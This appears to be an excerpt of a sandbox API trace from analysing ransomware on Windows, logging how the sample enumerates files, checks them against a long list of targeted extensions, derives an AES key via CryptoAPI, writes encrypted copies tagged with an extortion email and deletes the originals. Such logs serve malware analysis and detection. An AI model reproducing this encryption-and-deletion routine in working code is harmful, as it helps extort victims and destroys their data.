	[0176.857] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.858] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0176.859] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\guest.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 102
	[0176.859] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.860] WriteFile (in: hFile=0x390, lpBuffer=0xfde6a0*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfde6a0*, lpNumberOfBytesWritten=0x18b358*=0x1520, lpOverlapped=0x0) returned 1
	[0176.863] CloseHandle (hObject=0x390) returned 1
	[0176.863] CloseHandle (hObject=0x388) returned 1
	[0176.863] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png")) returned 1
	[0176.867] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png")) returned 0
	[0176.867] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d47fe2c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX.dat", cAlternateFileName="RDHJ0C~1.DAT")) returned 1
	[0176.867] lstrcmpW (lpString1="RDhJ0CNFevzX.dat", lpString2="..") returned 1
	[0176.868] lstrcmpW (lpString1="RDhJ0CNFevzX.dat", lpString2=".") returned 1
	[0176.868] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.868] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="RDhJ0CNFevzX.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat"
	[0176.868] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat") returned 67
	[0176.868] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.868] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat") returned 0x43
	[0176.868] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat") returned="c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat"
	[0176.868] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat") returned 67
	[0176.869] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.869] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0176.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.878] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.878] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x967, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-192.png", cAlternateFileName="")) returned 1
	[0176.878] lstrcmpW (lpString1="user-192.png", lpString2="..") returned 1
	[0176.878] lstrcmpW (lpString1="user-192.png", lpString2=".") returned 1
	[0176.878] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.878] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user-192.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png"
	[0176.879] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png") returned 63
	[0176.879] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.879] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png", cchLength=0x3f | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png") returned 0x3f
	[0176.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.879] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.879] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png"
	[0176.879] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png") returned 63
	[0176.879] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.880] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0176.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.880] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.881] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.881] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.881] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.882] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x967, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x967, lpOverlapped=0x0) returned 1
	[0176.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.884] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0176.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.887] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0176.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.887] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0176.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.888] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95f0) returned 1
	[0176.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.888] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x967, dwBufLen=0x967 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x970) returned 1
	[0176.888] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.888] RtlMoveMemory (in: Destination=0xfdd5e8, Source=0xfdc138, Length=0x967 | out: Destination=0xfdd5e8) 
	[0176.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.889] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd5e8*, pdwDataLen=0x18aefc*=0x967, dwBufLen=0x970 | out: pbData=0xfdd5e8*, pdwDataLen=0x18aefc*=0x970) returned 1
	[0176.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.890] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0176.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.890] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0176.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.890] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0176.890] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.891] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
